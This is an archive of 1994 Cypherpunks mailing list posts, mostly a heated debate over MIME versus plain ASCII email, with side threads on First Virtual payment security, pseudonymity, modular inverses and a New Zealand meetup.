iQCVAwUBLvCae+S0CjsjWS0VAQHYrgP/ZtHYxq1iVJmDMlMj3GIwfKfTGm+Dka63
8i1z1b5tRaML26Ny+P47ssGINAwA3/d5TsOH8VUh5ZhVVYZ7+paveS1rNBcKf8ek
JtnpSVrJ2QCW5QEamEs8wUUQJeHB1qGw85GLR56b1+YOQlI5qQ/DYDlI8Ip6xH3h
T+Pqo3zBGiA=
=x+8K
-----END PGP SIGNATURE-----

From perry at imsi.com Thu Dec 15 13:11:44 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Thu, 15 Dec 94 13:11:44 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To: <199412152012.MAA28503@netcom2.netcom.com>
Message-ID: <9412152110.AA01391@snark.imsi.com>

Timothy C. May says:
> I see two "stable attractors" for text/graphics/multimedia/etc. sent over the Net:
>
> 1. Straight text, ASCII, 80 column format. All systems can handle this, all mailers and newsreaders can handle it, it's what the Usenet is essentially based upon, and it gets the job done.

Sorry, Tim, but this isn't true. I know people who still own VIC-20s that can't handle 80 columns. Also, users of ASR-33 teletypes might be left out by the requirement to handle full ASCII. I was using an ASR-33 full time only 15 years ago.

Now, I know that all usenet postings in Japan these days use ISO-2022 encoded characters, and MIME and all that, and that people in Russia use similar methods to carry their stuff, but they are just bounders. I say it's back to 38 columns and upper-case only Baudot in order to meet the lowest common denominator.

> 2. The Web, for graphics, images, etc. This will be the next main stable attractor, deployed on many platforms.
> (I'm assuming the debate here about Netscape standards does not imply much of a fragmentation, that Mosaic, Netscape, MacWeb, etc., will all basically be able to display Web pages in much the same way.)

And of course there are no MIME standards; it's physically impossible to deploy MIME on two different platforms identically. Why, the specifications are all written in English, and we know no engineers can read! I can see why you would reject MIME so vehemently.

> The issue is not unwillingness to use new technology, it is, rather, the issue of "stable attractors."

I see.

> I don't think the minor extensions to e-mail (loosely called "MIME," though MIME serves other functions besides attaching graphics) are worth the effort, frankly. Most of the MIME messages (the ones that tell me about "ISO 558972 fonts" and "Press any key to return") don't seem to warrant the effort....

Let's get down to serious issues for a moment. Because you've got a shitty MIME reader, you've concluded that the technology is bad. That's all it comes down to. MIME allows fully multimedia in the style of the Web, you know. You can't say that the Web is good and consistently call MIME bad. If you want to see what a difference implementation makes, try using a text-based Web browser for a few hours and then compare it to Netscape. If you'd ever used NeXTMail, you'd understand why MIME is a good thing. Just because you are using a kludgy reader doesn't mean MIME is kludgy.

Perry

From jalicqui at prairienet.org Thu Dec 15 13:13:57 1994
From: jalicqui at prairienet.org (Jeff Licquia)
Date: Thu, 15 Dec 94 13:13:57 PST
Subject: McCoy is Right! New Mail Format to Start Now.
Message-ID: <9412152113.AA00540@firefly.prairienet.org>

-----BEGIN PGP SIGNED MESSAGE-----

Don't freak with the address... I'm moving. Check the sig if you're paranoid.

Tim's wise words were:
>The issue is not unwillingness to use new technology, it is, rather, the issue of "stable attractors."
>That is, what can I/we reasonably expect others to also have. Clearly if I issued my paper to the list in FrameMaker format, or Acrobat format, or even TeX format, only a few people would be able to read it. Fewer still would actually take the steps needed to actually display the paper.
>
>Standards, standards, standards!
>
>I don't think the minor extensions to e-mail (loosely called "MIME," though MIME serves other functions besides attaching graphics) are worth the effort, frankly. Most of the MIME messages (the ones that tell me about "ISO 558972 fonts" and "Press any key to return") don't seem to warrant the effort....I think in 90%+ of the cases people simply send messages as MIME by default, not because non-ASCII stuff is included.

Well, ignoring the fact that MIME appears to be infiltrating the Web as well...

I would differ with your analysis of MIME's lack of usefulness. It does provide a possible way to integrate PGP into the mail/Web landscape (from a crypto standpoint). Multimedia I'm not so sure about; I think the big draw to MIME will come when Person A drags and drops a spreadsheet into a MIME mailer and sends the message to Person B, who then clicks on an icon to pull up the spreadsheet. But I digress...

I'd say, however, that MIME isn't a done deal yet, though it's getting there. Until it's there, it's probably a bad idea. It's been my experience that many mailers are just MIME-compliant enough to cause their users lots of headaches. (As I write this, I notice I'm using Eudora, which MIMEs all its stuff. Oh, well; I hope this message isn't too much trouble for y'all...)

>If we make the leap, I say make the leap to the Web:
>
>cave drawings --> text --> e-mail --> Web
>
>(By Web I of course mean the whole ball of wax involving HTML/HTTP/etc.)
>
>This is not a rejection of new technology, just a wise selection of which technology to bet on.

I vote for MIME-encoded cave drawings.
:-)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLvCxGjER5KvPRd0NAQH+bgP8C5oOpT0Cgzh0m3yXYZmsvpaZqB5FuZUt
ZFQAHkKrIhaJ39IBhcJXv9Xmda/Jhp2wluvMDKlyzDxG/lvHJnr+h4cTJEUq6H57
bWPuQO2MBuBViOE77GFKreFzyLeamidlIlva3cIm/m/eYQXcF8l5qsNRB6O5kGe0
wq97dXfrVQ8=
=OyM1
-----END PGP SIGNATURE-----

From eric at remailer.net Thu Dec 15 13:16:08 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 15 Dec 94 13:16:08 PST
Subject: Algebra
In-Reply-To: <2B20CAE5>
Message-ID: <199412152213.OAA07233@largo.remailer.net>

   So, how is division defined in Fp?

There's a wonderful little theorem of broad technical use which says (a, b, m, n are all integers, or more generally, elements of a Euclidean domain)

   \forall a, b \in Z \exists m, n \in Z : a m + b n = gcd( a, b )

What this says is the greatest common divisor of 'a' and 'b' is a linear combination of them. The algorithm to find the gcd is the Euclidean algorithm; the algorithm to find the constants 'm' and 'n' is the extended Euclidean algorithm.

To define multiplicative inverses in F_p, substitute 'p' for 'b' in the above equation. The gcd of 'p' and any non-zero element of F_p is 1. (And we already knew you can't divide by zero.) Now, reduce the equation modulo p; this turns elements of Z into elements of F_p and the second term of the addition goes to zero. What you get is

   \forall a \in F_p \exists m \in F_p : a m = 1 (mod p)

That's the existence of multiplicative inverses in F_p. Use the extended Euclidean algorithm to calculate them.

Eric

From tcmay at netcom.com Thu Dec 15 13:20:52 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Thu, 15 Dec 94 13:20:52 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To:
Message-ID: <199412152119.NAA07643@netcom2.netcom.com>

Jonathan Rochkind wrote:

> >(By Web I of course mean the whole ball of wax involving HTML/HTTP/etc.)
> >
> >This is not a rejection of new technology, just a wise selection of which technology to bet on.
>
> HTTP and email serve different transport purposes. I don't think I really need to explain in what ways they are different, because we all know. Suffice it to say that mailing lists work better as a mailing list than it ever could as a web page, even with forms and all that stuff. A mailing list is a different transport-method choice than HTTP is.

Agreed, and I think my follow-up clarified my claim that the Web is the likely successor to standard e-mail.

I think a generation exposed to Mosaic and similar browsers will want to find ways to use these windows into the Net for _nearly everything_. They will not want to buy or learn separate mail programs, negotiate separate accounts, or deal with MIME sorts of issues. They will ask for, and get, "gateways" between mail and the Web. (Gateways may not be the right word.)

(We see this already, on the CP list, with Web pages containing the Cypherpunks list, with Web versions of my FAQ, etc. In the next few months, let alone the next few years, I expect to see more and more people reading the list via someone's Web pages. Maybe their own, maybe someone else's, etc.)

> I don't think we'll ever stop using email in favor of the web and HTTP, because they serve different purposes. I don't think Tim really does think we'll stop using email either, since I've heard him deprecate the web several times. He is just trying to convince us not to use MIME (or html for that matter) in email we send to the list, and thinks maybe this argument will convince us and not result in us calling him a technophobe. :)

I'm not sure what "deprecate the web" means here. I use "lynx" fairly regularly to retrieve stuff, and think it's pretty useful. I'm also a prime candidate for getting Netscape, when a few things stabilize (I won't say what, as that will then trigger the "Why don't you use X?" sorts of comments I get).
My main point is that the most compelling strategy seems to be to stick with ASCII for a while, avoid minor-but-painful gains with Postscript, Acrobat, Replica, TeX, FrameViewer, etc., and then jump to the Web/html/http/blah blah when the time is right.

--Tim May

From mccoy at io.com Thu Dec 15 13:26:48 1994
From: mccoy at io.com (Jim McCoy)
Date: Thu, 15 Dec 94 13:26:48 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To: <199412152012.MAA28503@netcom2.netcom.com>
Message-ID: <199412152125.PAA24115@pentagon.io.com>

tcmay at netcom.com (Timothy C. May) wrote:
[...]
> I see two "stable attractors" for text/graphics/multimedia/etc. sent over the Net:

[1. ASCII text, proving once and for all that Tim has never had to do any significant work with cross-OS networking or managing a heterogeneous LAN...]

>
> 2. The Web, for graphics, images, etc. [...]

Hmmm... and what kind of protocol does HTTP use for structuring the messages it passes from the server to the client.... RTFM Tim.

> I don't think the minor extensions to e-mail (loosely called "MIME," though MIME serves other functions besides attaching graphics) are worth the effort, frankly. Most of the MIME messages (the ones that tell me about "ISO 558972 fonts" and "Press any key to return") don't seem to warrant the effort....I think in 90%+ of the cases people simply send messages as MIME by default, not because non-ASCII stuff is included.
You should try spending some time working with mail crossing multiple gateways running different OSs and even different character sets [an EBCDIC<->ASCII cross is particularly fun...] The fact is that there are a variety of different commercial systems out there and they all seem to want to speak their own language. MIME provides a means of separating the message itself from the method and systems used to transport that message.

A mail message is the most basic form of communication structure that is commonly used on the net. News is just an extension of the mail message, MIME is another extension of the message, but in a different direction. It separates the message from the program that created it.

ObCrypto: Without MIME crypto will never have the unification we seek. With the MIME message format it is possible to put together a mail message that will not be mangled by passing through several different gateways or other network boundary objects, and it allows the message to bundle itself up into functional parts. It allows one to separate the signature from the message if you want, or create an encrypted message that can pass from a PC running on a Microsoft Mail system across the net to an Amiga that downloads it off a Fido BBS without the end-users needing to worry about what path it took and what kind of changes may have been made upon the message during transport.

On this particular subject you just haven't got a fucking clue what you are talking about Tim.

jim

From nsb at nsb.fv.com Thu Dec 15 13:31:36 1994
From: nsb at nsb.fv.com (Nathaniel Borenstein)
Date: Thu, 15 Dec 94 13:31:36 PST
Subject: FV & PGP (was Re: First Virtual email security)
In-Reply-To: <29936.787515091.1@nsb.fv.com>
Message-ID:

Excerpts from fv: 15-Dec-94 Re: FV & PGP (was Re: First.. Ben at CS.YALE.EDU (1253*)

> If you have to call, what would be the difference between this and normal mail order save that the catalog is digital? That's not a significant
> enough of a change to have it considered a new form of commerce.

The difference is that you only have to call ONCE, ever, and then you can order from any seller on the net that accepts First Virtual accounts, with no encryption required.

It's really silly for people to try to discuss FV's security without even understanding how it works. Please send mail to info at fv.com or spider over to http://www.fv.com.

-- Nathaniel

From tcmay at netcom.com Thu Dec 15 13:32:50 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Thu, 15 Dec 94 13:32:50 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To: <9412152110.AA01391@snark.imsi.com>
Message-ID: <199412152130.NAA09434@netcom2.netcom.com>

Perry E. Metzger wrote:

> Timothy C. May says:
> > I see two "stable attractors" for text/graphics/multimedia/etc. sent over the Net:
> >
> > 1. Straight text, ASCII, 80 column format. All systems can handle this, all mailers and newsreaders can handle it, it's what the Usenet is essentially based upon, and it gets the job done.
>
> Sorry, Tim, but this isn't true. I know people who still own VIC-20s that can't handle 80 columns. Also, users of ASR-33 teletypes might be left out by the requirement to handle full ASCII. I was using an ASR-33 full time only 15 years ago.

But this isn't 15 years ago, and I daresay there isn't a _single_ subscriber to the Cypherpunks list using a VIC-20 or anything remotely similar. Of the 600 or so subscribers, and certainly of the 100-200 involved posters, I would bet that essentially all of them can display ASCII text on an 80-column screen.

(I won't get into a Scholastic argument about what "all" means, as in "all systems can handle this," especially as in my message I later said "95%," but clearly 80-column ASCII is nearly universal these days. Not 15 years ago, perhaps, but this is now.)
> Now, I know that all usenet postings in Japan these days use ISO-2022 encoded characters, and MIME and all that, and that people in Russia use similar methods to carry their stuff, but they are just bounders. I say it's back to 38 columns and upper-case only Baudot in order to meet the lowest common denominator.

You are once again misrepresenting my points. I said no such thing.

> And of course there are no MIME standards; it's physically impossible to deploy MIME on two different platforms identically. Why, the specifications are all written in English, and we know no engineers can read! I can see why you would reject MIME so vehemently.

I said no such thing, so your sarcasm is wasted.

> > The issue is not unwillingness to use new technology, it is, rather, the issue of "stable attractors."
>
> I see.

Do you? You seemed to have read into my message what you wished to, that I was making some argument for going backward, as this has been the thrust of your sarcasm. I made no such point.

There's no point in arguing this any further.

--Tim May

From tcmay at netcom.com Thu Dec 15 13:35:08 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Thu, 15 Dec 94 13:35:08 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To: <199412152125.PAA24115@pentagon.io.com> Message-ID: <199412152133.NAA09727@netcom2.netcom.com> Jim McCoy wrote: > On this particular subject you just haven't got a fucking clue what you are > talking about Tim. So polite, so succinct. I'll remember this. --Tim -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From eric at remailer.net Thu Dec 15 13:37:12 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 15 Dec 94 13:37:12 PST Subject: properties of FV In-Reply-To: Message-ID: <199412152234.OAA07282@largo.remailer.net> [re: making a receivables system for small value] Assuming that thing that you're "cobbling together" is based on a reasonably robust database engine, it should scale a long, long way. It's not the technology but the number of different kinds of exceptions to track that cause it not to scale. You don't need to solve those problems right away, though. > Partial security is better than no security. That's a *very* interesting statement. I'm not at all sure what it means, so I'm not sure if I believe it or not. Sometimes partial security is worse than no security because it gives people a false *sense* of security. It's like this. If there are two ways to break into my house, bashing in the front door and climbing through second story windows, it's better to have a strong front door and no bars on the upper windows than to have no strength in the front door and still no bars. Regardless of the security, users need to understand what it gives them. 
This is orthogonal to the choice of security, as well as to the persistence of thick-headedness in society. > In particular, if a digital signature does not, by agreement, carry an > implied warranty of identity, then there's no problem at all. I sense that this wording was less than fully explanatory. What this means using FV as an example, say, is that FV will not claim that a signed message actually originated from someone. A signature would be _advisory only_, and carry no legal weight as a signature or a proof of identity. You can still require signatures, because this does improve security. Suppose that a customer disavows a signed transaction, saying "Someone must have hacked my account". What you could _not_ do in this example is then to claim that "Well, it must be your account; it has your signature on it", because _by agreement_ the customer is not making any implicit claims about who actually holds the private key. In fact, the disclaimer of a warranty of identity makes _explicit_ the fact that the private key is not relied upon to be held secretly. This is partial security. It is not all that can be accomplished with crypto; it is only a part. The partial security, however, still has value. > Use > the crypto entirely for transit security. If someone hacks your > machine and grabs your passphrase and forges a transaction, at least > the intruder has to grab your passphrase. This is exactly the way we would expect to use crypto layered on top of First Virtual's protocols, if and when such cryptographic protocols are deployed widely enough to have penetrated a meaningful portion of our market. "If and When" is Yes and Today. Anybody who can autosign their outgoing mail can participate in this kind of transaction already. Assuming the above agreement is made with respect to private keys, there is _no_ risk to the customer about loss of secret keys, and no greater risk to the merchant than what currently obtains.
The dreams of utopia in cryptography are beginning to hold back deployment as much as architectural problems. Eric From perry at imsi.com Thu Dec 15 13:37:52 1994 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 15 Dec 94 13:37:52 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412152130.NAA09434@netcom2.netcom.com> Message-ID: <9412152136.AA01440@snark.imsi.com> The point, Tim, is that you keep conflating a bad MIME read that you happen to use with the notion that MIME is bad. MIME doesn't force its users to understand anything about formats, character sets or anything else. Your mail reader is whats doing that. If you were, say, using the Andrew Messaging System which now understands MIME, you could remain blissfully ignorant the whole time of how the underpinnings work. .pm From mccoy at io.com Thu Dec 15 13:39:44 1994 From: mccoy at io.com (Jim McCoy) Date: Thu, 15 Dec 94 13:39:44 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412152133.NAA09727@netcom2.netcom.com> Message-ID: <199412152139.PAA25566@pentagon.io.com> Tim wrote: > Jim McCoy wrote: > > On this particular subject you just haven't got a fucking clue what you are > > talking about Tim. > > So polite, so succinct. > > I'll remember this. Please do. There are a great many issues which your input and opinions are a valuable contribution to the content of this list. There are others where you seem to make guesses as to where things are going without having much of a leg to stand on. Your MIME position hurts the widespread use of cryptography because the advantages MIME gives to crypto far outweigh the short-term costs associated with a systemic upgrade to a better method for message transport and encapsulation. jim From bshantz at spry.com Thu Dec 15 13:52:19 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Thu, 15 Dec 94 13:52:19 PST Subject: McCoy is Right! New Mail Format to Start Now. 
Message-ID: <9412152147.AA23272@homer.spry.com> Perry Metzger writes: >Sorry, Tim, but this isn't true. I know people who still own VIC-20s >that can't handle 80 columns. Also, users of ASR-33 teletypes might be >left out by the requirement to handle full ASCII. I was using an >ASR-33 full time only 15 years ago. 15 years ago, I was a 9 year old in the fifth grade who called the teacher a "nasty" name and was told to write 500 sentences as a reprimand. I asked if they could be typed, she said yes. So, I promptly went up to the 40 column display on the Apple IIe and wrote a four line, Apple Basic program that would repeatedly print 500 sentences saying, "It is not right to call the teacher names." When I handed it to her, she knew she'd been set up. That didn't go over well as I remember. Anyway, that's not really what I wanted to say. I wanted to say that as a company that writes a Mail package. One of the biggest complaints of our customers has been lack of MIME support. Also, we have been severely "wrist slapped" for not formatting our mail messages to 80 characters so "normal people" could read it on their mail readers. So, my point, the market right now is for MIME support and user setting message widths. You can't please everyone all the time. >Now, I know that all usenet postings in Japan these days use ISO-2022 >encoded characters, and MIME and all that, and that people in Russia >use similar methods to carry their stuff, but they are just >bounders. Japanese characters are considerably different. I've been on some Japanese news servers that you just can't read with a normal news reader just because they require graphical Japanese characters. (Kanji, Katakana, or Hiragana ... depends on the group.) By the way, I was testing a news reader, I can't read Kanji. -- Brad >>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<< Brad Shantz bshantz at spry.com Senior Software Engineer SPRY Inc. Direct #: (206)-442-8251 316 Occidental Ave. S.
Main #: (206)-447-0300 Suite 316 Fax #: (206)-447-9008 Seattle, WA 98104 WWW URL: http://WWW.SPRY.COM ---------------------------------------------------------------------- PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< From jamesd at netcom.com Thu Dec 15 14:10:15 1994 From: jamesd at netcom.com (James A. Donald) Date: Thu, 15 Dec 94 14:10:15 PST Subject: properties of FV In-Reply-To: <199412152234.OAA07282@largo.remailer.net> Message-ID: <199412152207.OAA18565@netcom10.netcom.com> Eric Hughes writes > The dreams of utopia in cryptography are beginning to hold back > deployment as much as architectural problems. Very true. Now could everyone keep that in mind before flaming Netscape. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jamesd at netcom.com Thu Dec 15 14:16:54 1994 From: jamesd at netcom.com (James A. Donald) Date: Thu, 15 Dec 94 14:16:54 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <9412152136.AA01440@snark.imsi.com> Message-ID: <199412152216.OAA19537@netcom10.netcom.com> Perry E. Metzger writes > The point, Tim, is that you keep conflating a bad MIME read that you > happen to use with the notion that MIME is bad. No two mimes seem to entirely agree what mime format is. I use Sun's stuff. It is a pile of stinking shit. This a new spark station 20, state of the art and all that. Sure, mime would be great if everyone had a great Mime and every diverse system with every diverse mime interpreter all worked and they all worked in the same way. This is not the case. 
-- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From andrew_loewenstern at il.us.swissbank.com Thu Dec 15 14:17:11 1994 From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern) Date: Thu, 15 Dec 94 14:17:11 PST Subject: properties of FV Message-ID: <9412152217.AA03954@ch1d157nwk> > This goes back to the two kinds of anonymity that you so usefully > defined in your earlier message. These small transactions would > have counterparty anonymity -- all that the seller knows is your > first virtual id, which is essentially a user-chosen pseudonym -- > but not issuer anonymity. That would make this counterparty pseudonymity, not anonymity. The merchant, while not knowing the true identity of his clients, is still able to correlate the transactions of individual accounts (and must be able to under FV's policies). A malicious merchant, for instance, could recognize that a particular account is more interested in certain types of information and charge accordingly. andrew From nsb at nsb.fv.com Thu Dec 15 14:20:48 1994 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Thu, 15 Dec 94 14:20:48 PST Subject: properties of FV In-Reply-To: <16267.787529765.1@nsb.fv.com> Message-ID: Excerpts from fv: 15-Dec-94 Re: properties of FV Andrew Lowenstern at il.us. (718*) > > This goes back to the two kinds of anonymity that you so usefully > > defined in your earlier message. These small transactions would > > have counterparty anonymity -- all that the seller knows is your > > first virtual id, which is essentially a user-chosen pseudonym -- > > but not issuer anonymity. > That would make this counterparty pseudonymity, not anonymity. 
The merchant, > while not knowing the true identity of his clients, is still able to > correlate the transactions of individual accounts (and must be able to under > FV's policies). A malicious merchant, for instance, could recognize that a > particular account is more interested in certain types of information and > charge accordingly. Good point. I stand corrected, at least as far as the terminology is concerned. However, as far as the particular malicious-merchant scenario is concerned, I must say I'd be skeptical about any merchant who didn't tell me the price up front, *before* he asked me for my account-id... -- Nathaniel From ianf at sydney.sgi.com Thu Dec 15 14:26:35 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Thu, 15 Dec 94 14:26:35 PST Subject: Zimmermann Defense Fund Appeal In-Reply-To: <199412151526.HAA05726@sleepy.retix.com> Message-ID: <9412160924.ZM13302@wiley.sydney.sgi.com> On Dec 15, 7:26am, joshua geller wrote: > this has always been the state of the american, and as far as I know > of all legal systems. Very true. Try as I might, I cannot think of any legal system in the world where a large amount of money cannot buy justice... or injustice. Ian. From perry at imsi.com Thu Dec 15 14:26:43 1994 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 15 Dec 94 14:26:43 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412152216.OAA19537@netcom10.netcom.com> Message-ID: <9412152226.AA01486@snark.imsi.com> James A. Donald says: > Perry E. Metzger writes > > The point, Tim, is that you keep conflating a bad MIME reader that you > > happen to use with the notion that MIME is bad. > > No two mimes seem to entirely agree what mime format is. Well, the specification is pretty clear. Its pretty simple stuff, actually, and remarkably well designed. > I use Sun's stuff. It is a pile of stinking shit. When last I checked, Sun's "Mailtool" did not support MIME, but supported a proprietary enclosure format. 
(This may have changed in the Openwindows supplied with 2.4, but to my knowledge 2.4 only came out weeks ago and it is unlikely that you are using it.) Perry From tcmay at netcom.com Thu Dec 15 14:28:22 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 15 Dec 94 14:28:22 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <9412152136.AA01440@snark.imsi.com> Message-ID: <199412152227.OAA05100@netcom12.netcom.com> As Perry is actually making some points without sarcasm (*) and without demonizing me as some Neanderthal bent on converting the list to a 20-column, all caps past, I'll respond: Perry E. Metzger wrote: > The point, Tim, is that you keep conflating a bad MIME read that you > happen to use with the notion that MIME is bad. MIME doesn't force its > users to understand anything about formats, character sets or anything > else. Your mail reader is whats doing that. If you were, say, using > the Andrew Messaging System which now understands MIME, you could > remain blissfully ignorant the whole time of how the underpinnings > work. Perhaps, but I don't have the Andrew Messaging System, nor do I expect most of the subscribers here. I see lots of AOL, Compuserve, Portal, Netcom, etc., accounts, and the range of mailers available to (most) of them does not include the AMS or similar things. I deeply resent--but will try not to take it personally, so no animosity to Perry or Jim or others is intended--the insinuation through sarcasm or through direct statements that I am hopelessly wedded to a past of ASR-33 terminals and good old-fashioned typewriters. Like a lot of folks here, I use stuff that's far beyond simple ASCII. I think I've adequately covered this point. Eric Hughes wrote a nice piece several weeks back about adoption of new technology, new tools all being a matter of _return on investment_. 
For example, I could spend some number of hours switching from my current mail program (elm) to some other editor which perhaps better-supported the MIME messages seen here. But if all I got for several hours of using, learning, and becoming comfortable with, say, "pine," was the ability to see an _italicized_ word, or a word in Cyrillic, then I would consider this a poor ROI. And nobody has yet said there's anything worth doing this for in any of the MIME messages I've yet seen. Sure, Amanda W. exercised the process by including a GIF....a process which several people saw errors with, and no doubt many others skipped completely. Does this make me backward? No. It's all ROI. Like it or not, we are now in a mostly-ASCII Net environment. This shows up when people fail to convert special characters (apostrophes, left and right quotes, em dashes, bullets, etc.) into the "straight ASCII" characters (such as ', ", --, *) that most of the rest of us can display easily. People rightly complain about posts and messages filled with "^H" and other oddball symbols. (And it certainly doesn't mean that people like me don't have the capability of displaying extended character sets....I clearly can, given the right tools, effort, etc. Many can't, and many won't. The "Display Postscript" standard was an attempt to bootstrap the world to a new standard for document display, and it failed. Maybe the "Andrew Message System" is another such fix. Maybe it's even better designed. All well and good. But it ain't available to most of us. Nor would I even install it if all I got was em dashes and the like displayed correctly. ROI, again.) Please don't characterize my views as Luddite wishes for a simpler world. --Tim May -- .......................................................................... Timothy C.
May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From CCGARY at MIZZOU1.missouri.edu Thu Dec 15 14:28:25 1994 From: CCGARY at MIZZOU1.missouri.edu (Gary Jeffers) Date: Thu, 15 Dec 94 14:28:25 PST Subject: rng & program docs. programs Message-ID: <9412152228.AA22773@toad.com> -----BEGIN PGP SIGNED MESSAGE----- Dear Cypherpunks, 1. I need a good DOS software random number generator for a crypto project of mine. Can anyone give me the ftp site & other d/l info. of something good? 2. Also needed, is some software documentation tools. - shareware or free. Here's the problem: I program in PC Assembler & C & although I program structured & use modules, I find that when I have a lot of subs that if I pick out anyone of them, that I have a hard time relating it to the rest of the code. That is to say: if I start out with say 3 major modules & have them call subs that call subs that call subs, then when I examine anyone sub, it is hard to understand its relation to the rest of the code. Anyone recommend a program with an ftp site or have any helpful info on this? Yours Truly, Gary Jeffers Following is my military grade public key armored. 
From Tony.Gurnick at nzdairy.co.nz Thu Dec 15 14:45:11 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Thu, 15 Dec 94 14:45:11 PST Subject: Kiwi Cypherpunks! Message-ID: <94121519471967@nzdairy.co.nz> >From: SMTP%"phillip at mserve.kiwi.gen.nz" >To: Bryce Boland >CC: >Subj: Re: New zealand meetings? > >On Wed, 14 Dec 1994, Bryce Boland wrote: > >> Yeah, lets do it then. It might be kind of difficult to hook up a >> workstation at GP's, but we can arrange something. Then we might be able to >> arrange a more permanent/suitable venue. >> > >Sounds good to me also ;-) > >CC: DNA , cwedgwood at cybernet.co.nz, > pgut1 at cs.auckland.ac.nz Well thats 2 replys, Man it`s going to be packed! :) When a meeting happens what do we discuss?/do? - an obvious one would be NZ crypto! - New crypto ideas? - NZ Anon remailers & Repositorys - Patents??? (maybe not) - Cryptanalasis (Hopefully, oh please-oh please) Um, what else T PS: Why do we need a workstation? (probably a dumb question) From andrew_loewenstern at il.us.swissbank.com Thu Dec 15 14:45:31 1994 From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern) Date: Thu, 15 Dec 94 14:45:31 PST Subject: properties of FV Message-ID: <9412152245.AA04184@ch1d157nwk> > > That would make this counterparty pseudonymity, not anonymity.
> > The merchant, while not knowing the true identity of his clients, > > is still able to correlate the transactions of individual accounts > > (and must be able to under FV's policies). A malicious merchant, > > for instance, could recognize that a particular account is more > > interested in certain types of information and charge accordingly. > > Good point. I stand corrected, at least as far as the terminology > is concerned. However, as far as the particular malicious-merchant > scenario is concerned, I must say I'd be skeptical about any merchant > who didn't tell me the price up front, *before* he asked me for my > account-id... -- Nathaniel Of course, but what if you bought something from a Web server, revealing your account-id to the server. A smart server could adjust the prices on pages that haven't been retrieved yet. I don't know if this is necessarily possible with http (i.e. does your client always use the same return port number for requests during a given instance of the client? ), but you get the idea. Worse, linkability of transactions also allows the merchant to do 'payment traffic analysis' in an attempt to determine the real identities of its clients. Many merchants can get together and compare transaction logs as well... These 'attacks' are a feature of any payment system that has only counter party pseudonymity (as opposed to anonymity), not just First Virtual... andrew From perry at imsi.com Thu Dec 15 14:46:55 1994 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 15 Dec 94 14:46:55 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412152227.OAA05100@netcom12.netcom.com> Message-ID: <9412152246.AA01511@snark.imsi.com> Timothy C. May says: > For example, I could spend some number of hours switching from my > current mail program (elm) to some other editor which perhaps > better-supported the MIME messages seen here.
But if all I got for > several hours of using, learning, and becoming comfortable with, say, > "pine," was the ability to see an _italicized_ word, or a word in > Cyrillic, then I would consider this a poor ROI. You misunderstand the purpose of MIME. It is a way of standardizing the encapsulation of non-ascii information and references inside of an RFC-822 mail message. It allows you to do things like get cyrillic or what have you, but more importantly, it allows things like recursive encapsulation of your messages inside encrypting transformations, the transmission of attachments along with documents, mailing HTML, embedding external references in mail (i.e. "Click here to get a copy of my latest program") and dozens of other significant things. MIME and HTML are complementary to each other -- HTTP is one way of transporting HTML, but with MIME you can see a Web page, cut it out, paste it into your MIME aware gee-whiz mailer, and send it to someone who could then treat it just like he was looking at the Web, provided he, too, had a good enough MIME capable reader. You could send out your latest document, in parallel, in postscript and in Word format (or whatever) so that lots of people could read it and prepend an explanatory document describing what the contents were -- some MIME readers will then display the attachment as an icon that you could then drag and drop into an appropriate viewer or printer. MIME is a general infrastructural mechanism for this and more. It's a bit of a toy right now on mailing lists because too many people lack MIME capable readers, but in environments where MIME is universally used it has already taken over and is a fundamental part of the way people do business.
